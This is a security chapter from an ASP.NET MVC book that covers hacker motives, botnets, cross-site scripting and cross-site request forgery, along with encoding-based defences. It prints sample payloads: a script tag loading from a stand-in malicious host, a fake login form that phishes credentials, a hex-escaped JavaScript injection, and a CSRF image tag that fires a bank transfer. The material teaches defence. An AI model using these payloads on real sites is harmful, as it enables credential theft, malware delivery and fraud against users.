Let's face it: Security isn't sexy. Most of the time when you read a chapter on security it's either underwritten or very, very overbearing. The good news for you is that we the authors read these books, too — a lot of them — and we're quite aware that we're lucky to have you as a reader, and we're not about to abuse that trust. In short, we really want this chapter to be informative because it's very important!

This chapter is one you absolutely must read, as ASP.NET MVC doesn't have as many automatic protections as ASP.NET Web Forms does to secure your page against malicious users. To be perfectly clear: ASP.NET Web Forms tries hard to protect you from a lot of things. For example:

Server Components HTML-encode displayed values and attributes to help prevent XSS attacks.

View State is encrypted and validated to help prevent tampering with form posts.

Request Validation (<%@ Page ValidateRequest="true" %>) intercepts malicious-looking data and offers a warning (this is something that is still turned on by default with ASP.NET MVC).

Event Validation helps protect against injection attacks and the posting of invalid values.

The transition to ASP.NET MVC means that handling some of these things falls to you — this is scary for some folks, a good thing for others.

If you're of the mind that a framework should "just handle this kind of thing" — well, we agree with you, and there is a framework that does just this: ASP.NET Web Forms, and it does it very well. It comes at a price, however, which is that you lose some control with the level of abstraction introduced by ASP.NET Web Forms (see Chapter 3 for more details). For some, this price is negligible; for others, it's a bit too much. We'll leave the choice to you. Before you make this decision, though, you should be informed of the things you'll have to do for yourself with ASP.NET MVC — and that's what this chapter is all about.

The number one excuse for insecure applications is a lack of information or understanding on the developer's part, and we'd like to change that — but we also realize that you're human and are susceptible to falling asleep. Given that, we'd like to offer you the punch line first, in what we consider to be a critical summary statement of this chapter:

Never, ever trust any data your users give you. Ever.

Any time you render data that originated as user input, HTML-encode it (or Attribute Encode it if it's displayed as an attribute value).

Don't try to sanitize your users' HTML input yourself (using a whitelist or some other method) — you'll lose.

Use HTTP-only cookies when you don't need to access cookies via client-side script (which is most of the time).

Strongly consider using the AntiXSS library (www.codeplex.com/AntiXSS).

There's obviously a lot more we can tell you — including how these attacks work and about the minds behind them. So hang with us — we're going to venture into the minds of your users, and, yes, the people who are going to try to hack your site are your users, too. You have enemies, and they are waiting for you to build this application of yours so they can come and break into it. If you haven't faced this before, then it's usually for one of two reasons:

You haven't built an application.

You didn't find out that someone hacked your application.

Hackers, crackers, spammers, viruses, malware — they want into your computer and the data inside it. Chances are that your e-mail inbox has deflected many e-mails in the time that it's taken you to read this. Your ports have been scanned, and most likely an automated worm has tried to find its way into your PC through various operating system holes.

This may seem like a dire way to start this chapter; however, there is one thing that you need to understand straight off the bat: it's not personal. You're just not part of the equation. It's a fact of life that some people consider all computers (and their information) fair game; this is best summed up by the story of the turtle and the scorpion.

You and your application are surrounded by scorpions — each of them is asking for a ride.

We're at war and have been ever since you plugged your first computer into the Internet. For the most part, you've been protected by spam filters and antivirus software, which fend off several attempted intrusions per hour.

When you decided to build a web application, the story became a little more dramatic. You've moved outside the walls of the keep and have ventured out toward the frontlines of a major, worldwide battle: the battle for information. It's your responsibility to keep your little section of the Great Wall of Good as clear of cracks as possible, so the hordes don't cave in your section.

This may sound drastic — perhaps even a little dramatic — but it's actually very true. The information your site holds can be used in additional hacks later on. Worse yet, your server or site can be used to further the evil that is junk mail or possibly to participate in a coordinated zombie attack.

Sun Tzu, as always, puts it perfectly:

If you know both yourself and your enemy, you will win numerous battles without danger.

Sun Tzu, The Art of War

together with

All warfare is based on deception.

Sun Tzu, The Art of War

... is where we will begin this discussion. The danger your server and information face doesn't necessarily come from someone on the other end of the line. It can come from perceived friends, sites that you visit often, or software you use routinely.

Most security issues for users come from deception.

If you've ever read a book about hackers and the hacker mentality, one thing quickly becomes apparent: There is no one reason why they do it. Like the scorpion, it's in their nature. The term Black Hat is used quite often to describe hackers who set out to explore and steal information "for the fun of it." White Hat hackers generally have the same skills, but put their talents to good use, creating open source software and generally trying to help.

However, things have changed over the years. While early hackers tended to do it for the thrill of it, these days they're in it for the money. Hackers are generally looking for something that will pay, with the least chance of getting caught. Usually, this comes in the form of user data: e-mail addresses and passwords, credit card numbers, and other sensitive information that your users trust you with.

The stealing of information is silent, and you most likely will never know that someone is (perhaps routinely) stealing your site's information — they don't want you to know. With that, you're at a disadvantage.

Information theft has supplanted curiosity as the motivator for hackers, crackers, and phreaks on the Web. It's big business.

The first thing to embrace is that the Black Hats are smarter than you and most likely know 10 times more than you do about computer systems and networks. This may or may not be true — but if you assume this from the beginning, you're ahead of the game. There is a natural order of sorts at work here — an evolution of hackers that are refining their evil over time to become even more evil. The ones who have been caught are only providing lessons to the ones who haven't, making the ones left behind more capable and smarter than before. It's a vicious game and one that we're a long way from stopping.

DEFCON is the world's largest hacker convention (yes, they have such things) and is held annually in Las Vegas. The audience is mainly computer security types (consultants, journalists, etc.), law enforcement (FBI, CIA, etc., who do not need to identify themselves), and coders who consider themselves to be on the fringe of computing.

A lot of business is done at the convention, as you can imagine, but there are also the obligatory feats of technical strength for the press to write about. One of these is called Capture the Flag, which, coincidentally, is also a popular video game format. The goal of Capture the Flag (or CTF) is for hacker teams to successfully compromise a set of specially configured servers. These aren't your typical servers: they are set up specifically to defend against such attacks and are configured for CTF by a world-renowned security specialist.

The servers (usually 12 or so) are set up with specific vulnerabilities:

A web server

A text-based messaging system

A network-based optical character recognition system

The teams are unaware of what each server is equipped with when the competition begins.

The scoring is simple: One point is awarded for penetrating the security of a server. Penetrate them all, and you win. If a team doesn't win, the contest is called at the end of 48 hours, and the team with the most points takes the crown. Variations on the game include penetrating a server and then resetting its defenses in order to secure it against other teams. The team who holds the most servers at the end of the competition wins.

The teams that win the game state that discipline and patience are what ultimately make the difference. Hacking the specially configured servers is not easy and usually involves coordinating attacks along multiple fronts, such as coaxing the web server to give up sensitive information, which can then be used in other systems on the server. The game is focused on knowing what to look for in each system, but the rules are wide open and cheating is quite often encouraged, which usually takes the form of a more personal style of intrusion — social engineering.

At one DEFCON CTF, the reigning champion Ghettohackers were once again on their way to winning in a variation of the CTF format called Root fu. In this format, you root your competition by placing a file called flag.txt in their flag room — usually their C drive or on a server somewhere in the game facility. You can gain points by rooting the main server (and winning) or by rooting your competition.

During this competition, one of the Ghettohackers team members smuggled in an orange hardhat with a reflective vest, and put it on with an electrician's utility belt. He then stood outside the server room (where the event was held) and waited for hotel staff to walk by. When a staff person eventually came by, the hacker impatiently asked if they were there to let him in and said that he was on a schedule and needed to get to a call upstairs.

Eventually he was let in by the hotel staff, and, looking at the diagram on the wall, he quickly figured out which machine was the main box — the server holding the main flag room. He pulled out his laptop and plugged it into the machine, quickly hacking his way onto the machine to win the game.

It doesn't take much to deceive people who like to help others: you just need to be evil and give them a reason to trust you, and you're in.

Kevin Mitnick is widely regarded as the most prolific and dangerous hacker in U.S. history. Through various ruses, hacks, and scams he found his way into the networks of top communication companies as well as Department of Defense computer systems. He managed to steal a lot of very expensive code by using simple social engineering tricks, such as posing as a company employee or flat out asking employees for his lost password over the phone.

His plan was simple — take advantage of two basic laws about people:

We want to be nice and help others.

We usually leave responsibility to someone else.

In an interview with CNET, Kevin stated it rather bluntly:

[Hackers] use the same methods they always have — using a ruse to deceive, influence or trick people into revealing information that benefits the attackers. These attacks are initiated, and in a lot of cases, the victim doesn't realize [it]. Social engineering plays a large part in the propagation of spyware. Usually, attacks are blended, exploiting technological vulnerabilities and social engineering.

http://news.cnet.com/Kevin-Mitnick,-the-great-pretender/2008-1029_3-6083668.html

Social engineering does not necessarily mean that someone is going to come up to you with a fake moustache and an odd-looking uniform, asking for access to your server. It could come in the form of a fake request from your ISP, asking you to log in to your server's Web control panel to change a password. It may also be someone who befriends you online — perhaps wanting to help with a side project you're working on. The key to a good hack is patience, and often it takes only weeks to feel like you know someone. Eventually, they may come to know a lot about you and, more hazardously, about your clients and their sensitive information.

As discussed previously, the key personal weapons for Black Hat attackers are:

Relentless patience

Ingenuity and resources

Social engineering skills

These are in no particular order — but they are essentially the three elements that underscore a successful hacker. No matter how much you may know about computers, you are up against someone who likely knows a lot more, and who has a lot more patience. He or she also knows how to deceive you.

The goal for these people is no longer mere exploration. Money is now the motivator, and there's a lot of it to be had if you're willing to be evil. Information stored in your site's database, and more likely the resources available on your machine, are the prizes of today's Black Hats.

If your system (home or server) is ever compromised, it's likely that it will be in the name of spam.

Spam needs no explanation or introduction. It is ubiquitous and evil, the scourge of the Internet. How it continues to be the source of all evil on the Internet is something within our control, however. If you're wondering why people bother doing it (since spam blocking is fairly effective these days), it turns out that spamming is surprisingly effective — for the cost.

Spamming is essentially free, given how it's carried out. According to one study, usually only 1 in 10 million recipients of spam e-mail "follow through" and click an ad. The cost of sending those 10 million e-mails is close to zero, so it's immediately profitable. To make money, however, the spammers need to up their odds, so more e-mails are sent. Currently, the Messaging Anti-Abuse Working Group (MAAWG, 2007) estimates that 90 percent (or more) of e-mail sent on the Internet is spam, and a growing percentage of that e-mail links to or contains viruses that help the spam network grow itself. This self-growing, automated network of zombie machines (machines infected with a virus that puts them under remote control) is what's called a botnet. Spam is never sent from a central location; it would be far too easy to stop its proliferation in that case.

Most of the time a zombie virus will wait until you've logged out for the evening, and will then open your ports, disguise itself from your network and antivirus software, and start working its evil. It's likely you will never know this is happening, until you are contacted by your ISP, who has begun monitoring the traffic on your home computer or server, wondering why you send so many e-mails at night.

Much of the e-mail that is sent from a zombie node contains links, which will further the spread of itself. These links are less about advertising and more about deceit and trickery, using tactics such as Stupid Theme, which tells people they have been videotaped naked or won a prize in a contest. When a user clicks the link, he is redirected to a site (which could be yours!) that downloads the virus to his machine. These zombie hosts are often well-meaning sites (like yours!) that don't protect against cross-site scripting (XSS) or allow malicious ads to be served — covered later in this chapter.

As of today, the lone gunmen hackers have been replaced by digital militias of virus builders, all bent on propagating global botnets.

There is a great chance that you've had the Conficker, Srizbi, Kraken, or Storm Trojans on a computer that you've worked on (server or desktop). These Trojans are so insidious and pervasive that Wikipedia credits them with sending more than 90 percent of the world's spam. Currently, the botnet that is controlled by these Trojans is estimated to be as many as 10 million computers and servers and is capable of sending up to 100 billion messages a day.

In September 2007, the FBI declared that the Storm botnet was both sophisticated and powerful enough to force entire countries offline. Some have argued, however, that trying to compute the raw power of these botnets is missing the point, and some have suggested the comparison is like comparing "an army of snipers to the power of a nuclear bomb."

The Storm network has propagated, once again largely due to social engineering and provocative e-mailing, which entices users to click on a link that navigates them to an infected website (which could be yours!). To stay hidden, the servers that deliver the virus re-encode the binary file so that a signature changes, which defeats the antivirus and malware programs running on most machines. These servers are also able to avoid detection, as they can rapidly change their DNS entries — sometimes minutes apart, making these servers almost untraceable.

Srizbi is pure evil, and you've likely visited a website that has tried to load it onto your computer. It is propagated using MPack, a commercially available malware kit written in PHP. That's right, you can purchase software with the sole purpose of spreading viruses. In addition to that, you can ask the developers of MPack to help you make your code undetectable by various antivirus and malware services.

MPack is implemented using an IFRAME, which embeds itself on a page (out of sight) and calls back to a main server, which loads scripts into the user's browser. These scripts detect which type of browser the user is running and what vulnerabilities the scripts can exploit. It's up to the malware creator to read this information and plant his or her evil on your computer.

Because MPack works in an IFRAME, it is particularly effective against sites that don't defend very well against XSS. An attacker can plant the required XSS code on an innocent website (like yours!) and, thus, create a propagation point, which then infects thousands of other users.

Srizbi runs in kernel mode (capable of running with complete freedom at the core operating system level, usually unchecked and unhindered) and will actually take command of the operating system, effectively pulling a Jedi mind trick by telling the machine that it's not really there. One of these tricks is to actually alter the New Technology File System (NTFS) filesystem drivers, making itself completely unrecognizable as a file and rendering itself invisible. In addition to this, Srizbi is also able to manipulate the infected system's TCP/IP instructions, attaching directly to the drivers and manipulating them so that firewalls and network sniffers will not see it. Very evil.

The hallmark of Srizbi is its silence and stealth. All of the estimates for infection that we've suggested here are just that — estimates. No one knows the real number of infected machines.

As of this writing, the Conficker botnet is considered to be the largest in the world, affecting as many as 6 million computers worldwide. Although Microsoft issued patches in October 2008 to protect against Conficker infection, computers with weak passwords or unsecured shares are still vulnerable. Conficker is thought to be the largest computer worm infection since the 2003 SQL Slammer, affecting millions of home, business, and government computer systems.

Conficker doesn't break any new ground technically but is notable due to its combined use of many different existing malware strategies. The worm exploits dictionary attacks on weak passwords, known weaknesses on weak ADMIN$ shares, and can spread via removable drives as well as over networks.

Many FBI officials fear that these vast botnets will be used to attack power grids or government websites, or worse yet, will be used in denial of service (DoS) attacks on entire countries. Matt Sergeant, a security analyst at MessageLabs, postulates:

In terms of power, [the botnet] utterly blows the supercomputers away. If you add up all 500 of the top supercomputers, it blows them all away with just two million of its machines. It's very frightening that criminals have access to that much computing power, but there's not much we can do about it.

It is estimated that only 10-20% of the total capacity and power of the Storm botnet is currently being used.

http://www.informationweek.com/news/internet/showArticle.jhtml?articleID=201804528

One has to wonder at the capabilities of these massive networks and why they aren't being used for more evil purposes, such as attacking governments or corporations that don't meet with some agenda (aka digital terrorism). The only answer that makes sense is that they are making money from what they are doing and are run by people who want to keep making money and who also want to stay out of sight. This can change, of course, but for now, know that you can make a difference in this war. You can help by knowing your vulnerabilities as the developer of your site and possible caretaker of your server.

The rest of this chapter is devoted to helping you do this within the context of ASP.NET MVC.

The following section discusses cross-site scripting, what it means to you and how to prevent it.

You have allowed this attack before, and maybe you just got lucky and no one walked through the unlocked door of your bank vault. Even if you're the most zealous security nut, you've let this one slip — as we discussed previously, the Black Hats of this world are remarkably cunning, and they work harder and longer at doing evil than you work at preventing it. It's unfortunate, as cross-site scripting (XSS) is the number one website security vulnerability on the Web, and it's largely because of web developers unfamiliar with the risks (but, hopefully, if you've read the previous sections, you're not one of them!).

XSS can be carried out one of two ways: by a user entering nasty script commands into a website that accepts unsanitized user input or by user input being directly displayed on a page. The first example is called Passive Injection — whereby a user enters nastiness into a textbox, for example, and that script gets saved into a database and redisplayed later. The second is called Active Injection and involves a user entering nastiness into an input, which is immediately displayed on screen. Both are evil — let's take a look at Passive Injection first.

XSS is carried out by injecting script code into a site that accepts user input. An example of this is a blog, which allows you to leave a comment to a post, as shown in Figure 9-1.

This has four text inputs: name, e-mail, comment, and URL if you have a blog of your own. Forms like this make XSS hackers salivate for two reasons — first, they know that the input submitted in the form will be displayed on the site, and second, they know that encoding URLs can be tricky, and developers usually will forgo checking these properly since they will be made part of an anchor tag anyway.

One thing to always remember (if we haven't overstated it already) is that the Black Hats out there are a lot craftier than you are. We won't say they're smarter, but you might as well think of them this way — it's a good defense.

The first thing an attacker will do is see if the site will encode certain characters upon input. It's a safe bet that the comment field is protected and probably so is the name field, but the URL field smells ripe for injection. To test this, you can enter an innocent query, like the one in Figure 9-2.

It's not a direct attack, but you've placed a "less than" sign into the URL; what you want to see is if it gets encoded to &lt;, which is the HTML replacement character for "<". If you post the comment and look at the result, all looks fine (see Figure 9-3).

There's nothing here that suggests anything is amiss. But we've already been tipped off that injection is possible — there is no validation in place to tell you that the URL you've entered is invalid! If you view the source of the page, your XSS Ninja Hacker reflexes get a rush of adrenaline because right there, plain as day, is very low-hanging fruit:

<a href="No blog! Sorry :<">Rob Conery</a>

This may not seem immediately obvious, but take a second and put your Black Hat on, and see what kind of destruction you can cause. See what happens when you enter this:

"><iframe src="http://haha.juvenilelamepranks.example.com" height="400" width=500/>

This entry closes off the anchor tag that is not protected and then forces the site to load an IFRAME, as shown in Figure 9-4.

This would be pretty silly if you were out to hack a site because it would tip off the site's administrator and a fix would quickly be issued. No, if you were being a truly devious Black Hat Ninja Hacker, you would probably do something like this:

"></a><script src="http://srizbitrojan.evil.example.com"></script> <a href="

This line of input would close off the anchor tag, inject a script tag, and then open another anchor tag so as not to break the flow of the page. No one's the wiser (see Figure 9-5).

Even when you hover over the name in the post, you won't see the injected script tag — it's an empty anchor tag!

Active XSS injection involves a user sending in malicious information that is immediately shown on the page and is not stored in the database. The reason it's called Active is that it involves the user's participation directly in the attack — it doesn't sit and wait for a hapless user to stumble upon it.

You might be wondering how this kind of thing would represent an attack. It seems silly, after all, for users to pop up JavaScript alerts to themselves or to redirect themselves off to a porn site using your site as a graffiti wall — but there are definitely reasons for doing so.





Consider the "search this site" mechanism, found on just about every site out there. Most site searches will return a message saying something to the effect of "Your search for 'XSS Attack!' returned X results:"; Figure 9-6 shows one from Rob's blog.

Most of the time this message is not HTML-encoded. The general feeling here is that if users want to play XSS with themselves, let them. The problem comes in when you enter the following text into a site that is not protected against Active Injection (using a Search box, for example):

"<br><br>Please login with the form below before proceeding:

<form action="mybadsite.aspx"><table><tr><td>Login:</td><td>

<input type=text length=20 name=login></td></tr>

<tr><td>Password:</td><td><input type=text length=20 name=password>

</td></tr></table><input type=submit value=LOGIN></form>"

Code snippet 9-1.txt

This little bit of code (which can be extensively modified to mess with the search page) will actually output a login form on your search page that submits to an offsite URL. The people at Acunetix maintain a site built intentionally to show how Active Injection can work; if you load the above term into its search form, the result is the page shown in Figure 9-7.

You could have spent a little more time with the site's CSS and format to get this just right, but even this basic little hack is amazingly deceptive. If a user were to actually fall for this, they would be handing the attacker their login information!

The basis of this attack is our old friend, social engineering:

Hey look at this cool site with naked pictures of you! You'll have to log in — I protected them from public view ...

The link would be this:

<a href="http://testasp.acunetix.com/Search.asp?tfSearch= <br><br>Please login

with the form below before proceeding:<form action="mybadsite.aspx"><table>

<tr><td>Login:</td><td><input type=text length=20 name=login></td></tr><tr>

<td>Password:</td><td><input type=text length=20 name=password></td></tr>

</table><input type=submit value=LOGIN></form>">look at this cool site with

naked pictures</a>

Code snippet 9-2.txt

There are plenty of people falling for this kind of thing every day, believe it or not.

This section outlines the various ways to prevent cross-site scripting.

XSS can be avoided most of the time by using simple HTML-encoding — the process by which the server replaces HTML reserved characters (like "<" and ">") with codes. You can do this with ASP.NET MVC in the View simply by using Html.Encode or Html.AttributeEncode for attribute values.

If you get only one thing from this chapter, please let it be this: every bit of output on your pages should be HTML-encoded or HTML-attribute-encoded. We said this at the top of the chapter, but we'd like to say it again: Html.Encode is your best friend.
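To make the effect of HTML-encoding concrete, here is a minimal sketch that runs outside of a View. It uses HttpUtility.HtmlEncode from System.Web, which we assume produces output equivalent to Html.Encode for this purpose; the SearchMessageDemo class and its two helper methods are hypothetical names made up for illustration, and the message text is modeled on the site-search example from earlier in the chapter.

```csharp
using System;
using System.Web; // HttpUtility; assumed to behave like Html.Encode for this sketch

public static class SearchMessageDemo
{
    // Hypothetical helper: builds the search message with the raw, unencoded term.
    public static string UnsafeMessage(string term)
    {
        return "Your search for '" + term + "' returned 0 results:";
    }

    // Same message, but the user-supplied term is HTML-encoded before it is used.
    public static string SafeMessage(string term)
    {
        return "Your search for '" + HttpUtility.HtmlEncode(term) + "' returned 0 results:";
    }

    public static void Main()
    {
        string term = "<br><br>Please login with the form below:<form action=\"mybadsite.aspx\">";

        // A browser would treat this output as markup and render a real form.
        Console.WriteLine(UnsafeMessage(term));

        // Here the angle brackets and quotes are replaced with character references,
        // so a browser would display the markup as plain text instead.
        Console.WriteLine(SafeMessage(term));
    }
}
```

The only difference between the two helpers is the single call to HtmlEncode, which is the point: the protection is cheap, but it has to be applied at every place where user-supplied text reaches the page.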

Note

ASP.NET MVC 2 makes this even easier by leveraging the new ASP.NET 4 HTML Encoding Code Block syntax, which lets you replace

<%= Html.Encode(Model.FirstName) %>

with the much shorter

<%: Model.FirstName %>.

For more information on using Html.Encode and HTML Encoding Code Blocks, see the discussion in Chapter 6.

It's worth mentioning at this point that ASP.NET Web Forms guides you into a system of using server controls and postback, which, for the most part, tries to prevent XSS attacks. Not all server controls protect against XSS (Labels and Literals, e.g.), but the overall Web Forms package tends to push people in a safe direction.

ASP.NET MVC offers you more freedom — but it also allows you some protections out-of-the-box. Using the HtmlHelpers, for example, will encode your HTML as well as encode the attribute values for each tag. In addition, you're still working within the Page model, so every request is validated unless you turn this off manually.

But you don't need to use any of these things to use ASP.NET MVC. You can use an alternate ViewEngine and decide to write HTML by hand — this is up to you, and that's the point. This decision, however, needs to be understood in terms of what you're giving up, which are some automatic security features.

Most of the time it's the HTML output on the page that gets all the attention; however, it's important to also protect any attributes that are dynamically set in your HTML. In the original example shown previously, we showed you how the author's URL can be spoofed by injecting some malicious code into it. This was accomplished because the sample outputs the anchor tag like this:

<a href="<%=Url.Action(AuthorUrl)%>"><%=AuthorUrl%></a>

To properly sanitize this link, you need to be sure to encode the URL that you're expecting. This replaces reserved characters in the URL with other characters (" " with %20, e.g.).

You might also have a situation in which you're passing a value through the URL based on what the user input somewhere on your site:

<a href="<%=Url.Action("index","home",new {name=ViewData["name"]})%>">Click here</a>

Code snippet 9-3.txt

If the user is evil, she could change this name to:

"></a><script src="http://srizbitrojan.evil.example.com"></script> <a href="

and then pass that link on to unsuspecting users. You can avoid this by using encoding with Url.Encode or Html.AttributeEncode:

<a href="<%=Url.Action("index","home",new

{name=Html.AttributeEncode(ViewData["name"])})%>">Click here</a>

or

<a href="<%=Url.Encode(Url.Action("index","home",

new {name=ViewData["name"]}))%>">Click here</a>

Bottom line: Never, ever trust any data that your user can somehow touch or use. This includes any form values, URLs, cookies, or personal information received from third-party sources such as Open ID. Remember that your database or services your site accesses could have been compromised, too. Anything input to your application is suspect, so you need to encode everything you possibly can.
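The idea of encoding a value for the exact spot where it lands can also be sketched outside of a View. The example below is an illustration under stated assumptions rather than the way Url.Action works internally: it uses HttpUtility.UrlEncode and HttpUtility.HtmlAttributeEncode from System.Web directly, and the LinkDemo class, the BuildLink helper, and the /home/index path are all hypothetical.

```csharp
using System;
using System.Web; // HttpUtility.UrlEncode and HttpUtility.HtmlAttributeEncode

public static class LinkDemo
{
    // Hypothetical helper: builds a link whose query string carries a user-supplied name.
    public static string BuildLink(string name)
    {
        // First, URL-encode the value for its place inside the query string.
        string url = "/home/index?name=" + HttpUtility.UrlEncode(name);

        // Then attribute-encode the finished URL for its place inside href="...".
        return "<a href=\"" + HttpUtility.HtmlAttributeEncode(url) + "\">Click here</a>";
    }

    public static void Main()
    {
        // The same payload shown above: it tries to close the attribute and inject a script tag.
        string evil = "\"></a><script src=\"http://srizbitrojan.evil.example.com\"></script> <a href=\"";

        // The quotes and angle brackets are percent-encoded, so the attribute is never closed early.
        Console.WriteLine(BuildLink(evil));
    }
}
```

Two encodings are applied in this sketch because the value passes through two contexts: a URL query string and an HTML attribute. Each context has its own reserved characters, so each gets its own encoder.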

Just HTML-encoding everything isn't necessarily enough, though. Let's take a look at a simple exploit that takes advantage of the fact that HTML-encoding doesn't prevent JavaScript from executing.



We'll use a simple controller action that takes a username as a parameter and adds it to ViewData to display in a greeting.

public ActionResult Index(string UserName)

{

ViewData["UserName"] = UserName;

return View();

}

Code snippet 9-4.txt

We want this message to look neat, though, so we'll animate it in with some jQuery:

<h2 id="welcome-message"></h2>

<script type="text/javascript">

$(function () {

var message = 'Welcome, <%: ViewData["UserName"] %>!';

$("#welcome-message").html(message).show();

});

</script>

Code snippet 9-5.txt

This looks great, and since we're HTML-encoding the ViewData, we're perfectly safe, right? No. No, we are not. The following URL will slip right through (see Figure 9-8):

http://localhost:35976/?UserName=Jon\x3cscript\x3e%20alert(\x27pwnd\x27)%20\x3c/script\x3e

What happened? Well, remember that we were HTML-encoding, not JavaScript-encoding. We were allowing user input to be inserted into a JavaScript string that was then added to the Document Object Model (DOM). That means that the hacker could take advantage of hex escape codes to put in any JavaScript code he or she wanted. And as always, remember that real hackers won't show a JavaScript alert — they'll do something evil, like silently steal user information or redirect them to another web page.

There are two solutions to this problem. The narrow solution is to use the Ajax.JavaScriptStringEncode function to encode strings that are used in JavaScript, exactly as we'd use Html.Encode for HTML strings.
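To see the narrow fix at work outside a view, the sketch below calls `HttpUtility.JavaScriptStringEncode` from System.Web (available from .NET 4), which is assumed here to behave the same way as the `Ajax.JavaScriptStringEncode` helper. The class name and the `BuildGreetingScript` method are hypothetical and exist only for illustration.

```csharp
using System;
using System.Web;

public static class JavaScriptEncodingDemo
{
    // Rebuilds the script line from the greeting example, encoding the
    // user name for use inside a JavaScript string literal.
    public static string BuildGreetingScript(string userName)
    {
        string safeName = HttpUtility.JavaScriptStringEncode(userName);
        return "var message = 'Welcome, " + safeName + "!';";
    }

    public static void Main()
    {
        // The attack value from the URL above, after the server has URL-decoded it.
        string attack = @"Jon\x3cscript\x3e alert(\x27pwnd\x27) \x3c/script\x3e";

        // Each backslash is doubled, so the browser sees literal text
        // instead of hex escape sequences.
        Console.WriteLine(BuildGreetingScript(attack));
    }
}
```

Because the backslashes are escaped, the JavaScript engine no longer turns \x3c into an angle bracket, and the welcome message simply shows the odd-looking name.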

A more thorough solution is to use the AntiXSS library.

Note

The extensibility point to allow overriding the default encoder was added in ASP.NET 4, so this solution is not available when targeting previous framework versions.

First, you're going to need to download the AntiXSS library from http://antixss.codeplex.com/. On my machine, that dropped the AntiXSSLibrary.dll file at the following location: C:\Program Files (x86)\Microsoft Information Security\Microsoft Anti-Cross Site Scripting Library v3.1\Library.





Copy the assembly into the project directory somewhere where you'll be able to find it. I typically have a lib folder or a Dependencies folder for this purpose (see Figure 9-9). Right-click the References node of the project to add a reference to the assembly (see Figure 9-10).

The next step is to write a class that derives from HttpEncoder. Note that in the following listing, some methods were excluded that are included in the project:

using System;

using System.IO;

using System.Web.Util;

using Microsoft.Security.Application;

/// <summary>

/// Summary description for AntiXss

/// </summary>

public class AntiXssEncoder : HttpEncoder

{

public AntiXssEncoder() { }

protected override void HtmlEncode(string value, TextWriter output)

{

output.Write(AntiXss.HtmlEncode(value));

}

protected override void HtmlAttributeEncode(string value, TextWriter output)

{

output.Write(AntiXss.HtmlAttributeEncode(value));

}

protected override void HtmlDecode(string value, TextWriter output)

{

base.HtmlDecode(value, output);

}

// Some code omitted but included in the sample

}

Code snippet 9-6.txt

Finally, register the type in web.config:

...

<system.web>

<httpRuntime encoderType="AntiXssEncoder, AssemblyName"/>

...

Code snippet 9-7.txt

Note

You'll need to replace AssemblyName with the actual name of your assembly, as well as a namespace if you decide to add one.

With that in place, any time you call Html.Encode or use an <%: %> HTML Encoding Code Block, the text will be encoded by the AntiXSS library, which takes care of both HTML and JavaScript encoding.

The following section discusses cross-site request forgery, what it means to you and how to prevent it.

A cross-site request forgery (CSRF, pronounced C-surf, but also known by the acronym XSRF) attack can be quite a bit more potent than simple cross-site scripting, discussed earlier. To fully understand what CSRF is, let's break it into its parts: XSS plus a confused deputy.

We've already discussed XSS, but the term confused deputy is new and worth discussing. Wikipedia describes a confused deputy attack as follows:

A confused deputy is a computer program that is innocently fooled by some other party into misusing its authority. It is a specific type of privilege escalation.

http://en.wikipedia.org/wiki/Confused_deputy_problem

In this case, that deputy is your browser, and it's being tricked into misusing its authority in representing you to a remote website. To illustrate this, we've worked up a rather silly yet annoying example.

Suppose that you work up a nice site that lets users log in and out and do whatever it is that your site lets them do. The Login action lives in your Account Controller, and you've decided that you'll keep things simple and extend the AccountController to include a Logout action as well, which will forget who the user is:

public ActionResult Logout() {

FormsAuth.SignOut();

return RedirectToAction("Index", "Home");

}

Code snippet 9-8.txt

Now, suppose that your site allows limited whitelist HTML (a list of acceptable tags or characters that might otherwise get encoded) to be entered as part of a comment system (maybe you wrote a forums app or a blog). Most of the HTML is stripped or sanitized, but you allow images because you want users to be able to post screen shots.

One day, a nice person adds this image to their comment:

<img src="/account/logout" />

Code snippet 9-9.txt

Now, whenever anyone visits this page, they are logged out of the site. Again, this isn't necessarily a CSRF attack, but it shows how some trickery can be used to coax your browser into making a GET request without your knowing about it. In this case, the browser did a GET request for what it thought was an image; instead, it called the logout routine and passed along your cookie. Boom: confused deputy.

This attack works because of the way the browser works. When you log in to a site, information is stored in the browser as a cookie. This can be an in-memory cookie (a session cookie), or it can be a more permanent cookie written to file. Either way, the browser tells your site that it is indeed you making the request.

This is at the core of CSRF — the ability to use XSS plus a confused deputy (and a sprinkle of social engineering, as always) to pull off an attack on one of your users. Unfortunately, CSRF happens to be a vulnerability that not many sites have prevention measures for (we'll talk about these in just a minute).

Let's up the stakes a bit and work up a real CSRF example, so put on your Black Hats and see what kind of damage you can do with your favorite massively public, unprotected website. We won't use real names here — so let's call this site Big Massive Site.

Right off the bat, it's worth noting that this is an odds game that you, as Mr. Black Hat, are playing with Big Massive Site's users. There are ways to increase these odds, which are covered in a minute, but straight away the odds are in your favor because Big Massive Site has upward of 50 million requests per day.

Now it comes down to the Play — finding out what you can do to exploit Big Massive Site's security hole: the inclusion of linked comments on their site. In surfing the Web and trying various things, you have amassed a list of "Widely Used Online Banking Sites" that allow transfers of money online as well as the payment of bills. You've studied the way that these Widely Used Online Banking Sites actually carry out their transfer requests, and one of them offers some serious low-hanging fruit — the transfer is identified in the URL:

http://widelyusedbank.example.com?function=transfer&amount=1000&toaccountnumber=23234554333&from=checking

Granted, this may strike you as extremely silly — what bank would ever do this? Unfortunately, the answer to that question is "too many," and the reason is actually quite simple — web developers trust the browser far too much, and the URL request that you're seeing above is leaning on the fact that the server will validate the user's identity and account using information from a session cookie. This isn't necessarily a bad assumption — the session cookie information is what keeps you from logging in for every page request! The browser has to remember something!

There are still some missing pieces here, and for that you need to use a little social engineering! You pull your Black Hat down a little tighter and log in to Big Massive Site, entering this as a comment on one of the main pages:

Hey did you know that if you're a Widely Used Bank customer the sum of the digits of your account number add up to 30? It's true! Have a look:

http://www.widelyusedbank.example.com

You then log out of Big Massive Site and log back in with a second, fake account, leaving a comment following the seed above as the fake user with a different name:

"OMG you're right! How weird!<img src="http://widelyusedbank.example.com?function=transfer&amount=1000&toaccountnumber=23234554333&from=checking" />.

Code snippet 9-10.txt

The game here is to get Widely Used Bank customers to go log in to their accounts and try to add up their numbers. When they see that it doesn't work, they head back over to Big Massive Site to read the comment again (or they leave their own saying it doesn't work).

Unfortunately, for Perfect Victim, their browser still has their login session stored in memory — they are still logged in! When they land on the page with the CSRF attack, a request is sent to the bank's website (where they are not ensuring that you're on the other end), and bam, Perfect Victim just lost some money.

